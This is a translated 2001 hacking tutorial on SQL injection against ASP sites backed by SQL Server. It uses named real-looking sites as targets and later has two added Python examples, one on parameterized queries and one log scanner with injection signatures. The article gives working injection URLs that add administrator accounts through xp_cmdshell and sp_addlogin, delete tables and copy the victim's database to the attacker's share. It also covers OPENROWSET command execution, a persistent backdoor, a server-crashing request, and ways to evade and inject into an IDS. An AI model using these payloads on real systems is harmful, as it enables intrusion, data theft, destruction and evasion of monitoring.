Simple intrusion and malicious damage to the database, with the Heaven site as the worked example
Many news, BBS and e-commerce websites are built with ASP on top of SQL Server, and a great many people write ASP (plenty of them fresh graduates), so attacks on ASP/SQL applications have a relatively high success rate. This kind of attack has little to do with the NT version or the SQL Server version, and there is no patch for it, because the vulnerability is created by the programmer: most ASP programming books carry it in their sample source code. In fact the attack is nothing but a few legal-looking requests from ASP to SQL, and then the suffering never ends.

The earliest form of this attack is the ' or '1'='1 flaw (for now we will call it a vulnerability). I think everyone should know this one. The next step is exec sp_addlogin hax (adding a hax user to the database), but this method has limits. First, the SQL Server account used by the ASP must be an administrator. Second, the submitted variable must be at the end of the whole SQL statement, because some programmers query the database with

    select * from news where id=... and topic=... and ...

and if the example above is used, news.asp?id=2;exec sp_addlogin hax becomes

    select * from news where id=2;exec sp_addlogin hax and topic=... and ...
After the SQL statement executes the sp_addlogin stored procedure, the AND condition that follows causes a syntax error, so sp_addlogin naturally does not run. So try the following:

    news.asp?id=2;exec sp_addlogin hax;--

The -- symbol turns the condition after sp_addlogin into a comment, so there is no syntax error and sp_addlogin executes normally. So let's use:

    news.asp?id=2;exec master.dbo.sp_addlogin hax;--
    news.asp?id=2;exec master.dbo.sp_password null,hax,hax;--
    news.asp?id=2;exec master.dbo.sp_addsrvrolemember sysadmin hax;--
    news.asp?id=2;exec master.dbo.xp_cmdshell 'net user hax /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
    news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators hax /add';--

This leaves a hax account in his database and in the system, with administrator rights of course. This assumes the ASP runs under an administrator account, so it isn't worth trying on virtual hosting space, where this vulnerability will not exist. What to do when the other party's ASP does not use the SQL administrator account we will discuss later; if we got in through port 1433 that is a different matter, of course. You can try id=2 and then append a ' character, mainly to see how the other side's ASP is written.
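The following is an added example, not code from the original article, showing the defender's side of the two flaws discussed so far: the value pasted into the SQL text (which lets ;exec ... and -- rewrite the statement) versus the same value passed as a query parameter. SQLite stands in for SQL Server here and refuses stacked statements outright, whereas SQL Server would execute them; the news table, its columns and the sample rows are assumed and constructed for the demonstration.

```python
import sqlite3

# Constructed sample data standing in for the site's news table (assumed schema).
NEWS_ROWS = [(1, "welcome", "first post"), (2, "prices", "second post")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table news (id integer primary key, topic text, body text)")
    conn.executemany("insert into news values (?, ?, ?)", NEWS_ROWS)
    return conn


def build_query_unsafe(news_id, topic):
    # The pattern the article criticises: request values pasted into the SQL text,
    # with further conditions after the injection point.
    return f"select * from news where id = {news_id} and topic = '{topic}'"


def run_unsafe(conn, news_id, topic):
    # Executes the concatenated text. SQLite refuses stacked statements, so an
    # injected second statement surfaces as an error here; SQL Server would run it.
    # A tautology in the topic value still executes as a single statement.
    try:
        return conn.execute(build_query_unsafe(news_id, topic)).fetchall()
    except (sqlite3.Error, sqlite3.Warning) as exc:
        return f"rejected: {exc}"


def parse_news_id(raw):
    # Whitelist the id as a plain non-negative integer; anything else is rejected
    # before it gets anywhere near the database.
    if not raw.isdigit():
        raise ValueError(f"invalid news id: {raw!r}")
    return int(raw)


def fetch_safe(conn, raw_id, topic):
    # Parameterized form: the driver sends id and topic as values, never as SQL
    # text, so ';', '--' and quotes inside them have no syntactic effect.
    news_id = parse_news_id(raw_id)
    return conn.execute(
        "select * from news where id = ? and topic = ?", (news_id, topic)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(build_query_unsafe("2;exec sp_addlogin hax;--", "x"))
    print(run_unsafe(db, "2", "x' or '1'='1"))        # tautology returns every row
    print(run_unsafe(db, "2;exec sp_addlogin hax;--", "x"))
    print(fetch_safe(db, "2", "x' or '1'='1"))        # parameter is just a string
```

The integer check and the parameter placeholders are the two controls that remove the whole class of requests the article builds on; note that the unsafe builder also silently drops the trailing topic condition once -- appears in the value.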
Now let's talk about what we do when the SQL account used by the ASP program is not an administrator. Take the homepage of Heaven as an example; it has news content, like this:

    http://www.talent.com.cn/news/news-2.asp?newid=117

You can try:

    http://www.talentitit.com.cn/news/news-2.asp?newid=117;select 123;--

Oh, it reports a syntax error, an error on select 123. Obviously Heaven's news ASP uses the newid variable with something after it. Then look at:

    http://www.talentitit.com.cn/news/news-2.asp?newid=117';delete news;--

Haha, I think as long as the table name is guessed, the news table is deleted. If the SQL account used by the ASP is not an administrator, it will at least be the owner of a database, with high management privileges over that database at least. But how do we find out which database it is? Look at the db_name() function: open your Query Analyzer and try print db_name(); huh, the name of the current database comes out. So, like this:

    declare @a sysname;set @a=db_name();backup database @a to disk='\\your IP\your shared directory\bak.dat',name='test';--

Oh, his current database is backed up to your hard drive, and you can do everything you want with it.

Let's first find the other side's SQL Server IP. Turn on your firewall's warnings for ICMP, TCP 139 and TCP 445, then try:

    news.asp?id=2;exec master.dbo.xp_cmdshell 'ping your ip'

If the firewall reports that someone is pinging you, then it is certain that the other party's ASP has SQL administrator privileges, and it also pins down the exact location of the other side's SQL Server, because many large websites separate the web server from the database for performance. When you can't see the other party's source code, I think this is the only way to locate the other side's SQL Server. If the other party's ASP does not have SQL administrator privileges, we can't call xp_cmdshell. What then? Don't worry, try this:

    news.asp?id=2;declare @a sysname;set @a=db_name();backup database @a to disk='\\your IP\your shared directory\bak.dat',name='test';--

Huh, your firewall should give a warning that someone is connecting to your port 445 or 139 (Win9x), so the other side's SQL Server IP is exposed this way too. If the other party is not even the database owner, what should we do? Next time I will tell you a better way. Actually, backing the database up to your own hard drive is still a bit exaggerated: if the other database is very large and you are on dial-up Internet, huh, huh, I advise you not to try, it's very... Next, we will talk about how to deceive an IDS in order to carry out an ASP SQL intrusion; some good IDSs have begun to monitor xp_cmdshell. Until next time, comrades.
I hope you submit all of the URLs above through VBScript, because the browser's address bar blocks some special characters, so your command cannot be transmitted in full. Simple xp_cmdshell calls alone are quite limited; in fact there are many places worth going deeper. For example www.guosen.com.cn (Guosen Securities) has this problem: they use Microsoft's three-tier architecture, the earlier xp_cmdshell approach does not work against it, and the strings are filtered, but I tried, and using SQL's heterogeneous queries it was still possible to open the Telnet service and an administrators group account on the other machine! Since the other side's firewall is very tight (CheckPoint), with only port 80 open, it is hard to get his database structure, but there is still a way :p By the way, I remind everyone to pay attention to the system functions SQLOLEDB, DB_NAME, OpenRowSet and OpenDataSource; when the SQL Server account used by the ASP is just a normal user, they will be useful!
SQL Server new vulnerabilities and some breakthroughs
Below I will talk about some new SQL Server bugs. Although I have been working hard, there was of course a bit of luck in finding them. I don't dare to enjoy them alone, so I am putting them out for everyone to look at; of course some masters probably already know them, after all I have been in contact with SQL Server for less than a year:
1. About OpenRowSet and OpenDataSource. Perhaps this is already a known trick, which is using OpenRowSet to issue local commands. Usually our usage (including MSDN's examples) is:

    select * from openrowset('SQLOLEDB','myserver';'sa';'','select * from table')

Visibly (even from the literal meaning) OpenRowset is just a quick way of accessing a remote database. It must follow a select, that is, it must return a recordset. So can we use it to call xp_cmdshell? The answer is yes:

    select * from openrowset('SQLOLEDB','server';'sa';'','set fmtonly off exec master.dbo.xp_cmdshell ''dir c:\''')

set fmtonly off must be added to disable the default setting that returns only column information, so that the result set returned by xp_cmdshell is handed to the outer select for display. With the default setting, an empty set is returned, the select reports an error, and the command is not executed. Now, if we want to call sp_addlogin, it does not return any result set the way xp_cmdshell does, so we can't rely on fmtonly. We can do this:

    select * from openrowset('SQLOLEDB','server';'sa';'','select ''ok!'' exec master.dbo.sp_addlogin hectic')

This returns at least the result set of select 'ok!'; your machine displays OK! and the other side's database also gains a hectic account. In other words, we use select 'ok!' to deceive the local select request, and the command is executed normally. sp_addsrvrolemember and OpenDataSource can do the same! As for the real uses of this method, everyone can think about it slowly :P
2. About MSDASQL's two requests. I don't know if you have tried connecting to a remote database with MSDASQL. Of course this API must be called by an administrator of SQL Server, so try the following:

    select * from openrowset('msdasql','driver={SQL Server};server=server;address=server,1433;uid=sa;pwd=;database=master;network=dbmssocn','select * from table1 select * from table2')

When the number of fields in table1 and table2 is not the same, you will find that the other side's SQL Server crashes; even local connections fail, and system resources are used up. After killing the SQL Server process with pskill, if the machine is not restarted, SQL Server cannot even start normally, and I often got illegal-operation errors. I just happened to find this bug and haven't looked into the specific reason. What is strange is that this phenomenon only appears with MSDASQL; SQLOLEDB has no such problem. So it seems the problem is not in the mismatch between the requested result sets and the returned ones but in MSDASQL itself. As for the specific reason, let's all study it together :P

3. The terrible back door. I have seen people on the Internet say that after getting into SQL Server you can leave a back door by adding triggers or jobs, or by rewriting sp_addlogin and sp_addsrvrolemember. These methods are of course feasible, but they are easy to discover. I don't know whether you have thought about SQLOLEDB's local connection mapping. For example, with your administrator account on the other side's SQL Server, execute:

    select * from openrowset('sqloledb','trusted_connection=yes;data source=hectic','set fmtonly off exec master..xp_cmdshell ''dir c:\''')

This creates a local connection mapping named hectic on the other side's SQL Server. As long as SQL Server is not restarted, this mapping will always exist; at least I don't know how to find someone else's connection mapping. OK, after the above command has run, you will find that even a guest user without any permissions can run the above command successfully! And the permissions are LocalSystem (default installation), huh! This method can be used to leave a back door in a SQL Server that was compromised with administrator privileges.
The above methods pass on SQL Server 2000 and SQL Server 2000 SP1!
* There is another guess. I don't know if you have paid attention to the two DSNs that come with Windows: one is LocalServer, the other is MSQi. Both connect to SQL Server with the local administrator account. If the other side's SQL Server is started under a custom Power User account, then sa has the same permissions as that Power User, and it is hard to do much. But with

    select * from openrowset('msdasql','dsn=localserver;trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''dir c:\''')

we should be able to connect to the local SQL Server through the local SQL Server's own account and then execute local commands with that account, which I would like to use to break through the Power User permissions of sa. The current problem is that SQLOLEDB cannot use a DSN connection, and MSDASQL does not let non-administrators call it, so I am looking for a way for guest to call MSDASQL. If someone knows how to break through this, or has a new idea, we can discuss it together. If it could be used successfully as guest, it would be a very serious security vulnerability, because any of the SQL statements mentioned earlier can be submitted to the other side's ASP and it will execute them for us :P

Use T-SQL to deceive IDS or attack IDS
Today's IDSs are getting smarter and smarter; they have added monitoring of xp_cmdshell and sp_addlogin. But after all, artificial intelligence hasn't arrived today, so this monitoring can always be deceived. First, deceiving the IDS. Since the IDS watches for the xp_cmdshell keyword, we can do this:

    declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'

Everyone can understand this code. Also, xp_cmdshell, as a stored procedure, has a fixed ID number in the master database; let's assume this id=988456:

    declare @a sysname select @a=name from sysobjects where id=988456 exec @a 'dir c:\'

Of course you can also write:

    declare @a sysname select @a=name from sysobjects where id=988455+1 exec @a 'dir c:\'

Arranged like this, there is nothing the IDS can do. sp_addlogin can be handled the same way.

Now about attacking the IDS. Because the IDS produces a large amount of data, its logs are usually backed up to a regular database such as SQL Server. If the old RecordSet.AddNew approach were used, it would seriously hurt the IDS's performance, so the logging is done with T-SQL requests through ADO, which is not only more efficient but also hands some of the work over to SQL Server. The logging is usually written as:

    insert table values ('log content', ...)

So I think, if you submit

    temp') exec xp_cmdshell 'dir c:\'--

it becomes

    insert table values ('log content' .... 'temp') exec xp_cmdshell 'dir c:\'--')

and so xp_cmdshell can run in the IDS's database :) Of course, the IDS is alert; it will record every message. But when the browser submits, it turns spaces into %20, so %20 is what gets submitted to SQL Server and your command cannot execute. The only way is:

    insert/**/table/**/values ('log content' .... 'temp')/**/exec/**/xp_cmdshell/**/'dir c:\'/**/--')

Using /**/ in place of spaces as separators, your T-SQL can execute in the IDS's database. You can use other statements too: you can destroy, or back up the IDS database to your shared directory. The principle is the same as attacking the ASP, just with spaces turned into /**/. In the original ASP case the statement was a select, so ' was used to close it off; now the IDS is in an insert statement, so ') is used to close it off. Many other new intrusion statements can be thought up slowly. The best testing tool is Query Analyzer.

Published: August 24, 2001
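As a defender's counterpart to the evasion tricks described in this last section (and to the probing requests in the first section), here is an added Python example that is not part of the original article. It canonicalizes a request's query string the way the database engine will eventually see it (URL decoding, /**/ comments collapsed to spaces, 'xp_'+'cmdshell' folded back into one literal) and only then matches signatures for the techniques the article lists: xp_cmdshell, sp_addlogin, sp_addsrvrolemember, sp_password, openrowset/opendatasource, backup database, db_name(), exec of a variable, sysobjects name lookups, stacked statements and trailing comments. The log layout is a simplified stand-in for IIS logs, the log lines are constructed, and 203.0.113.5 is a documentation address.

```python
import re
from urllib.parse import unquote_plus

# (label, regex) pairs drawn from the techniques discussed in the article; each is
# matched against the canonicalized query string, not the raw one.
SIGNATURES = [
    ("xp_cmdshell", r"\bxp_cmdshell\b"),
    ("sp_addlogin", r"\bsp_addlogin\b"),
    ("sp_addsrvrolemember", r"\bsp_addsrvrolemember\b"),
    ("sp_password", r"\bsp_password\b"),
    ("openrowset/opendatasource", r"\bopen(rowset|datasource)\s*\("),
    ("backup database", r"\bbackup\s+database\b"),
    ("db_name()", r"\bdb_name\s*\("),
    ("stacked statement", r";\s*(exec|select|delete|declare|insert|update|backup)\b"),
    ("dynamic exec via variable", r"\bexec\s+@\w+"),
    ("sysobjects name lookup", r"\bfrom\s+sysobjects\b"),
    ("trailing comment", r"--"),
]


def canonicalize(raw_query):
    """Undo the encodings the article relies on so the signatures see plain T-SQL."""
    s = unquote_plus(raw_query)                    # %20 and '+' -> space, %2B -> '+'
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)   # /**/ used in place of spaces
    s = re.sub(r"\s+", " ", s).strip().lower()
    # Fold 'xp_'+'cmdshell' (or two adjacent literals) back into a single literal.
    # Each pass removes one pair of quotes, so the loop always terminates.
    pair = re.compile(r"'([^']*)'\s*\+?\s*'([^']*)'")
    while True:
        folded = pair.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", s, count=1)
        if folded == s:
            return s
        s = folded


def scan_query(raw_query):
    """Return the labels of every signature that matches the canonical form."""
    canon = canonicalize(raw_query)
    return [label for label, rx in SIGNATURES if re.search(rx, canon)]


# Constructed log lines in a simplified layout: client-ip method uri query.
SAMPLE_LOG = [
    "203.0.113.5 GET /news/news-2.asp newid=117",
    "203.0.113.5 GET /news/news-2.asp newid=117;select%20123;--",
    "203.0.113.5 GET /news.asp id=2;exec%20master.dbo.xp_cmdshell%20'ping%20203.0.113.5';--",
    "203.0.113.5 GET /news.asp id=2;declare/**/@a/**/sysname;set/**/@a='xp_'%2B'cmdshell';exec/**/@a/**/'dir%20c:\\';--",
    "203.0.113.5 GET /news.asp id=2;declare%20@a%20sysname;select%20@a=name%20from%20sysobjects%20where%20id=988455%2B1;exec%20@a%20'dir%20c:\\';--",
]


def scan_log(lines):
    """Yield (line number, raw query, matched labels) for every flagged request."""
    findings = []
    for n, line in enumerate(lines, 1):
        parts = line.split(" ", 3)
        if len(parts) < 4:
            continue                                # no query string on this line
        hits = scan_query(parts[3])
        if hits:
            findings.append((n, parts[3], hits))
    return findings


if __name__ == "__main__":
    for n, query, hits in scan_log(SAMPLE_LOG):
        print(n, hits)
        print("   ", canonicalize(query))
```

The fifth sample line is the instructive one: after canonicalization it contains no xp_cmdshell at all, so a scanner keyed on that word alone misses it, and it is the exec-of-a-variable and sysobjects-lookup signatures, plus the stacked statement and trailing comment, that flag it.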